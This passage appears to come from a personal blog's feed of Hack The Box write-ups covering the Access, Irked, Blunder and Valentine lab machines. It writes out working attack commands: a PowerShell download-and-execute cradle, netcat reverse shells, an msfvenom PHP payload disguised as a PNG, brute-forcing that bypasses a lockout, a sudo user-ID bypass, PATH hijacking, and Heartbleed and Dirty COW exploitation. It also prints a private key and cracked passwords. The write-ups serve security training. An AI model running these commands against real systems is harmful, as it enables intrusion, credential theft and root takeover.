Invoke.ps1, of course, because the previous port is already in use on the Kali box by the current PowerShell session.\nPS C:\\Users\\security> runas /user:ACCESS\\Administrator /savecred \"powershell /C IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9:8888/Invoke.ps1')\"\n--------KALI---------\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ nc -lnvp 1339\nlistening on [any] 1339 ...\nconnect to [10.10.16.9] from (UNKNOWN) [10.10.10.98] 49216\nWindows PowerShell running as user Administrator on ACCESS\nCopyright (C) 2015 Microsoft Corporation. All rights reserved.\n\nPS C:\\Windows\\system32>whoami\naccess\\administrator\nPS C:\\Windows\\system32> cd C:\\Users\\Administrator\nPS C:\\Users\\Administrator> cd Desktop\nPS C:\\Users\\Administrator\\Desktop> ls\n\n    Directory: C:\\Users\\Administrator\\Desktop\n\nMode                LastWriteTime     Length Name\n----                -------------     ------ ----\n-ar--         2/16/2025   6:02 PM         34 root.txt\n\nPS C:\\Users\\Administrator\\Desktop> cat root.txt\n339f.....e901\nTips\nAlways go through the accessible user folders before running winPEAS.\n","date":"2025-02-18T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/access-htb/","title":"HTB | Access"},{"content":"Machine name: Irked, OS: Linux, IP: 10.10.10.117, Difficulty: Easy\nSystem info\nircd@irked:/home/djmardov/Documents$ uname -a\nLinux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux\nircd@irked:/home/djmardov/Documents$ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Debian\nDescription:    Debian GNU/Linux 8.10 (jessie)\nRelease:        8.10\nCodename:       jessie\nEnumeration\nnmap\n┌──(kali㉿kali)-[~]\n└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.117\nPORT      STATE SERVICE REASON  VERSION\n22/tcp    open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)\n| ssh-hostkey:\n|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)\n|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)\n|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)\n|   256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)\n80/tcp    open  http    syn-ack Apache httpd 2.4.10 ((Debian))\n|_http-server-header: Apache/2.4.10 (Debian)\n|_http-title: Site doesn't have a title (text/html).\n| http-methods:\n|_  Supported Methods: OPTIONS GET HEAD POST\n111/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo:\n|   program version    port/proto  service\n|   100000  2,3,4        111/tcp   rpcbind\n|   100000  2,3,4        111/udp   rpcbind\n|   100000  3,4          111/tcp6  rpcbind\n|   100000  3,4          111/udp6  rpcbind\n|   100024  1          34862/tcp   status\n|   100024  1          41825/tcp6  status\n|   100024  1          46351/udp   status\n|_  100024  1          49135/udp6  status\n6697/tcp  open  irc     syn-ack UnrealIRCd\n8067/tcp  open  irc     syn-ack UnrealIRCd\n34862/tcp open  status  syn-ack 1 (RPC #100024)\n65534/tcp open  irc     syn-ack UnrealIRCd\nService Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel\nFoothold\nExploit: UnrealIRCd\n┌──(kali㉿kali)-[~]\n└─$ nc -nv 10.10.10.117 6697\n(UNKNOWN) [10.10.10.117] 6697 (ircs-u) open\n:irked.htb NOTICE AUTH :*** Looking up your hostname...\nAB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.27 1337 >/tmp/f\n:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead\n------------------------------------------\n┌──(kali㉿kali)-[~]\n└─$ nc -lnvp 1337\nlistening on [any] 1337 ...\n
connect to [10.10.16.19] from (UNKNOWN) [10.10.10.117] 53736\nbash: cannot set terminal process group (625): Inappropriate ioctl for device\nbash: no job control in this shell\nircd@irked:~/Unreal3.2$ whoami\nwhoami\npwdircd\nircd@irked:~/Unreal3.2$ pwd\n/home/ircd/Unreal3.2\nircd@irked:~/Unreal3.2$ python3 -V\npython3 -V\nPython 3.4.2\nircd@irked:~/Unreal3.2$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nircd@irked:~/Unreal3.2$ export TERM=xterm\nexport TERM=xterm\nircd@irked:~/Unreal3.2$ ^Z\nzsh: suspended  nc -lnvp 1337\n┌──(kali㉿kali)-[~]\n└─$ stty raw -echo; fg\n[1]  + continued  nc -lnvp 1337\nircd@irked:~/Unreal3.2$\nircd@irked:~/Unreal3.2$ whoami\nircd\nircd -> djmardov\n.backup - password\nWe find a .backup file in user djmardov's Documents folder, containing a password:\nircd@irked:/home/djmardov/Documents$ cat .backup\nSuper elite steg backup pw\nUPupDOWNdownLRlrBAbaSSss\nsteghide\nWe find the words \"steg\" and \"pw\" in the .backup file, so we assume some steganography has to be done on an image. The only image available on the server is the website's, in /var/www/html/irked.jpg. We use the steghide tool to extract a string from the image with the password found above, and it works: we recover djmardov's password:\n┌──(kali㉿kali)-[~/htb/Irked]\n└─$ steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf ./irked.jpg\nwrote extracted data to \"pass.txt\".\n┌──(kali㉿kali)-[~/htb/Irked]\n└─$ cat pass.txt\nKab6h+m+bbp2J:HG\nSSH djmardov - user flag\n┌──(kali㉿kali)-[~/htb/Irked]\n└─$ ssh djmardov@irked.htb\nThe authenticity of host 'irked.htb (10.10.10.117)' can't be established.\nED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yzqs\nPlease type 'yes', 'no' or the fingerprint: yes\nWarning: Permanently added 'irked.htb' (ED25519) to the list of known hosts.\nKab6h+m+bbp2J:HG\ndjmardov@irked.htb's password:\n\nThe programs included with the Debian GNU/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in /usr/share/doc/*/copyright.\n\nDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue May 15 08:56:32 2018 from 10.33.3.3\ndjmardov@irked:~$ whoami\ndjmardov\ndjmardov@irked:~$ ls\nDesktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos\ndjmardov@irked:~$ cat user.txt\n0d95.....9a07\nPrivilege Escalation\nSUID binary: viewuser\nAfter running linpeas, we notice a suspicious SUID binary: /usr/bin/viewuser. Yes, you had to spot that one... Looking closer, we see that it calls the \"who\" command without an absolute path. So we add the /tmp directory to PATH, then create a file there containing a command that sets the SUID bit on /bin/bash, and run bash -p to get root directly. We could potentially also have put /bin/bash straight into who.\nIn the other writeups, people instead use the file /tmp/listusers with /bin/bash inside it, quite simply, because the binary contains a setuid(0); system('/tmp/listusers').\nWe notice that there is no setuid(0) before the system('who')... So I don't see how my exploit works, and yet it does work!\nbash-4.3# echo $PATH\n/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games\nbash-4.3# export PATH=/tmp:$PATH\nbash-4.3# echo $PATH\n/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games\n------------------------\nnano /tmp/who ----> chmod +s /bin/bash\n-------------------------------\ndjmardov@irked:~$ /usr/bin/viewuser\nThis application is being devleoped to set and test user permissions\nIt is still being actively developed\nsh: 1: /tmp/listusers: Permission denied\ndjmardov@irked:~$ bash -p\nbash-4.3# whoami\nroot\nbash-4.3# cat /root/root.txt\n259a.....a166\n","date":"2025-02-16T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/irked-htb/","title":"HTB | Irked"},{"content":"Machine name: Blunder, OS: Linux, IP: 10.10.10.191, Difficulty: Easy\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv 10.10.10.191\nPORT   STATE  SERVICE REASON       VERSION\n21/tcp closed ftp     conn-refused\n80/tcp open   http    syn-ack      Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache/2.4.41 (Ubuntu)\n|_http-title: Blunder | A blunder of interesting facts\n|_http-generator: Blunder\n| http-methods:\n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA\nFoothold\nWebserver: todo.txt\nOn port 80 we find a web server. At its root is a todo.txt file with interesting information.\n-Update the CMS\n-Turn off FTP - DONE\n-Remove old users - DONE\n-Inform fergus that the new blog needs images - PENDING\nBruteforce admin login page\nWe can brute-force the admin page with the potential user \"fergus\" that we found in todo.txt.\n
There is a brute-force protection that blacklists our IP. But we can set the \"X-Forwarded-For: 127.0.0.1\" header to another random IP and make new authentication attempts. Someone has already written a Ruby script on GitHub to run this brute-force attack easily. It can be found with searchsploit but also online: https://github.com/noraj/Bludit-auth-BF-bypass\nAs for the password list, the password does not seem to be in rockyou. The reflex is therefore to build a list with cewl from all the words on the home page:\ncewl http://10.10.10.191 > pass.txt\nWe can now run our brute-force attack with the script, the user fergus and the password list built from the words on the website's home page:\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ ruby exploit.rb -r http://10.10.10.191 -u fergus -w ./pass.txt\n[*] Trying password: CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)\n[*] Trying password: the\n...\n...\n[*] Trying password: book\n[*] Trying password: collections\n[*] Trying password: Bram\n[*] Trying password: Stoker\n[*] Trying password: British\n[*] Trying password: Society\n[*] Trying password: Book\n[*] Trying password: Foundation\n[*] Trying password: him\n[*] Trying password: Distinguished\n[*] Trying password: Contribution\n[*] Trying password: Letters\n[*] Trying password: probably\n[*] Trying password: best\n[*] Trying password: fictional\n[*] Trying password: character\n[*] Trying password: RolandDeschain\n[+] Password found: RolandDeschain\nWe find the following creds: fergus:RolandDeschain\nDirectory Traversal\nWe find an exploit on searchsploit that allows uploading a png image containing php code. Here we generate a reverse shell with msfvenom that we upload as a png image. Then we can reach it and execute the code by visiting the URL: /bl-content/tmp/temp/evil.png\n#####################################################\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ msfvenom -p php/reverse_php LHOST=10.10.16.19 LPORT=1337 -f raw -b '\"' > evil.png\n[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload\n[-] No arch selected, selecting arch: php from the payload\nFound 1 compatible encoders\nAttempting to encode payload with 1 iterations of php/base64\nphp/base64 succeeded with size 4051 (iteration=0)\nphp/base64 chosen with final size 4051\nPayload size: 4051 bytes\n\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ echo -e \"<?php $(cat evil.png)\" > evil.png\n#######################################################\n## After the first test, I could not stabilise my shell,\n## so I used a different php code to open a reverse shell\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ cp php-reverse-shell.php evil.png\n\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ cat evil.png\n<?php eval(base64_decode('IoJG91dCkpOwogICAgICB......2xvc2UoJHMpOwogICAgfQo'));\n\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ echo \"RewriteEngine off\" > .htaccess\n\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ echo \"AddType application/x-httpd-php .png\" >> .htaccess\n\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ python3 dir_traversal.py\ncookie: qg5smk61bhamr0lg3t0s8n9mq5\ncsrf_token: 6325cd57b7d27ae4de54cefa8d79d6a7e15279d8\nUploading payload: evil.png\nUploading payload: .htaccess\n----------------------------------------------------------------\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.16.19] from (UNKNOWN) [10.10.10.191] 36802\nLinux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n 23:40:39 up 1 day,  7:09,  1 user,  load average: 0.00, 0.00, 0.00\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nshaun    :0       :0               Tue16   ?xdm?   8:54   0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n/bin/sh: 0: can't access tty; job control turned off\n$ whoami\nwww-data\n$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nwww-data@blunder:/$ export TERM=xterm\nexport TERM=xterm\nwww-data@blunder:/$ ^Z\nzsh: suspended  nc -lnvp 1337\n┌──(kali㉿kali)-[~/htb/Blunder]\n└─$ stty raw -echo; fg\n[1]  + continued  nc -lnvp 1337\nwww-data@blunder:/$ whoami\nwww-data\nGetting Hugo user - user flag\nBrowsing the web server files a little, we quickly find hugo's password hash: faca404fd5c0a31cf1897b823c695c85cffeb98d. With crackstation we get: hugo : Password120\nI grepped for hugo because I had seen that user's name in the /home directory.\n
Moreover, hugo was the user who owned the user.txt file.\nwww-data@blunder:/$ cd var\nwww-data@blunder:/var$ cd www\nwww-data@blunder:/var/www$ ls\nbludit-3.10.0a  bludit-3.9.2  html\nwww-data@blunder:/var/www$ grep -rni hugo\nbludit-3.10.0a/bl-content/databases/users.php:4:        \"nickname\": \"Hugo\",\nbludit-3.10.0a/bl-content/databases/users.php:5:        \"firstName\": \"Hugo\",\nwww-data@blunder:/var/www$ cd bludit-3.10.0a/\nwww-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content/\nwww-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases/\nwww-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls\ncategories.php  plugins  site.php  tags.php\npages.php  security.php  syslog.php  users.php\nwww-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php\n<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n{\n    \"admin\": {\n        \"nickname\": \"Hugo\",\n        \"firstName\": \"Hugo\",\n        \"lastName\": \"\",\n        \"role\": \"User\",\n        \"password\": \"faca404fd5c0a31cf1897b823c695c85cffeb98d\",\n        \"email\": \"\",\n        \"registered\": \"2019-11-27 07:40:55\",\n        \"tokenRemember\": \"\",\n        \"tokenAuth\": \"b380cb62057e9da47afce66b4615107d\",\n        \"tokenAuthTTL\": \"2009-03-15 14:00\",\n        \"twitter\": \"\",\n        \"facebook\": \"\",\n        \"instagram\": \"\",\n        \"codepen\": \"\",\n        \"linkedin\": \"\",\n        \"github\": \"\",\n        \"gitlab\": \"\"\n    }\n}\nwww-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo\nPassword:\nhugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd\nhugo@blunder:~$ cat user.txt\n779f.....44d0\nPrivilege Escalation\nCVE-2019-14287: hugo -> root\nWe run sudo -l as hugo:\nexit\nhugo@blunder:~$ sudo -l\nMatching Defaults entries for hugo on blunder:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser hugo may run the following commands on blunder:\n    (ALL, !root) /bin/bash\nWe see that he can open a shell as any user except root.\nSearching the web a bit (plus chatGPT) for whether this restriction can be bypassed, we discover a CVE:\nCVE-2019-14287: Sudo doesn't check for the existence of the specified user id and executes with an arbitrary user id with the sudo privilege; -u#-1 returns as 0, which is root's id. (Likewise for 4294967295, which exceeds the limit of an int? Gives 0, so root's id again?)\nand /bin/bash is executed with root permission\nhugo@blunder:~$ sudo -u#-1 /bin/bash\nroot@blunder:/home/hugo# whoami\nroot\nroot@blunder:/home/hugo# cat /root/root.txt\n99b9.....1d73\n------------V2-------------\nhugo@blunder:~$ sudo -u#4294967295 /bin/bash\nroot@blunder:/home/hugo# whoami\nroot\n","date":"2025-02-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/blunder-htb/","title":"HTB | Blunder"},{"content":"Machine name: Valentine, OS: Linux, IP: 10.10.10.79, Difficulty: Easy\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv 10.10.10.79\nPORT    STATE SERVICE  REASON  VERSION\n22/tcp  open  ssh      syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)\n|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)\n|   256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)\n80/tcp  open  http     syn-ack Apache httpd 2.2.22 ((Ubuntu))\n|_http-server-header: Apache/2.2.22 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\n| http-methods:\n|_  Supported Methods: GET HEAD POST OPTIONS\n443/tcp open  ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))\n|_ssl-date: 2025-02-09T12:49:15+00:00; +1s from scanner time.\n| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US\n| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2018-02-06T00:45:25\n| Not valid after:  2019-02-06T00:45:25\n| MD5:   a413:c4f0:b145:2154:fb54:b2de:c7a9:809d\n| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1\n| -----BEGIN CERTIFICATE-----\n| MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV\n|_-----END CERTIFICATE-----\n| http-methods:\n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.2.22 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\nFoothold\nWebsite (port 80)\nWe find a website on port 80 with the following domain name: valentine.htb\ngobuster\nWe find the following directories/files:\n/dev\n/encode <-- encodes to base64\n/decode <-- decodes base64\n/dev/hype.key\n/dev/notes.txt <-- explains that there are code problems in encode/decode\nThe hype.key file is an RSA private key encoded in hexadecimal.\n
We recover it with CyberChef:\n-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd 
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 -----END RSA PRIVATE KEY----- Heartbleed Vulnerability A serious vulnerability is discovered thanks to nmap --script.\nnmap --script ┌──(kali㉿kali)-[~] └─$ nmap --script vuln 10.10.10.79 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 17:54 EST Nmap scan report for 10.10.10.79 Host is up (0.077s latency). 
Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)' |_ /index/: Potentially interesting folder 443/tcp open https |_http-csrf: Couldn't find any CSRF vulnerabilities. | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://www.openssl.org/news/secadv_20140407.txt | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 |_ http://cvedetails.com/cve/2014-0160/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the \"POODLE\" issue. 
| Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.securityfocus.com/bid/70574 |_ https://www.openssl.org/~bodo/ssl-poodle.pdf | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the \"CCS Injection\" vulnerability. | | References: | http://www.cvedetails.com/cve/2014-0224 | http://www.openssl.org/news/secadv_20140605.txt |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | http-enum: | /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)' |_ /index/: Potentially interesting folder |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) heartbleed attack Using a Python script, we can exploit Heartbleed and recover information. In particular, we obtain a base64 string containing the passphrase of the SSH key found earlier.\n┌──(kali㉿kali)-[~/htb/Valentine/heartbleed-poc] └─$ python2 ./heartbleed-poc.py 10.10.10.79 | sleep 1 | cat dump.bin | grep -ia '==' -A5 -B5 42 ▒ ##0.0.1/decode.php Content-Type: application/x-www-form-urlencoded Content-Length: 42 $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== W��׼�K�o�s!J�P[ ... 
We decode the base64\n┌──(kali㉿kali)-[~/htb/Valentine/heartbleed-poc] └─$ echo -n \"aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==\" | base64 -d heartbleedbelievethehype We decrypt the key permanently so we no longer have to type the passphrase:\n┌──(kali㉿kali)-[~/htb/Valentine] └─$ openssl rsa -in hype.key -out hype.decrypted_key -passin pass:heartbleedbelievethehype writing RSA key SSH hype | user flag ┌──(kali㉿kali)-[~/htb/Valentine] └─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i hype.key hype@10.10.10.79 Enter passphrase for key 'hype.key': Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64) * Documentation: https://help.ubuntu.com/ New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3 hype@Valentine:~$ cat user.txt 7b7f.....1de5 Privilege escalation .bash_history We observe that a directory \"/.devs/\" exists, containing a tmux terminal session \"/.devs/dev_sess\".\nhype@Valentine:~$ cat .bash_history exit exot exit ls -la cd / ls -la cd .devs ls -la tmux -L dev_sess tmux a -t dev_sess tmux --help tmux -S /.devs/dev_sess exit Root tmux session - root flag hype@Valentine:~$ tmux -S /.devs/dev_sess root@Valentine:/home/hype# whoami root root@Valentine:/home/hype# cat /root/root.txt ced9.....6598 Privilege escalation 2 - Dirtycow A list of possible Dirty COW exploits can be found at this link: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\ndirtycow Here is the one we are going to run: https://github.com/FireFart/dirtycow/blob/master/dirty.c\n'Generates a new password hash on the fly and modifies /etc/passwd automatically. 
Just run and pwn.'\nhype@Valentine:~$ gcc -pthread diirty.c -o diirty -lcrypt hype@Valentine:~$ chmod +x diirty hype@Valentine:~$ ./diirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash mmap: 7f0df1fda000 madvise 0 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'hello'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'hello'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd hype@Valentine:~$ cat /etc/passwd firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash /sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false lightdm:x:104:111:Light Display 
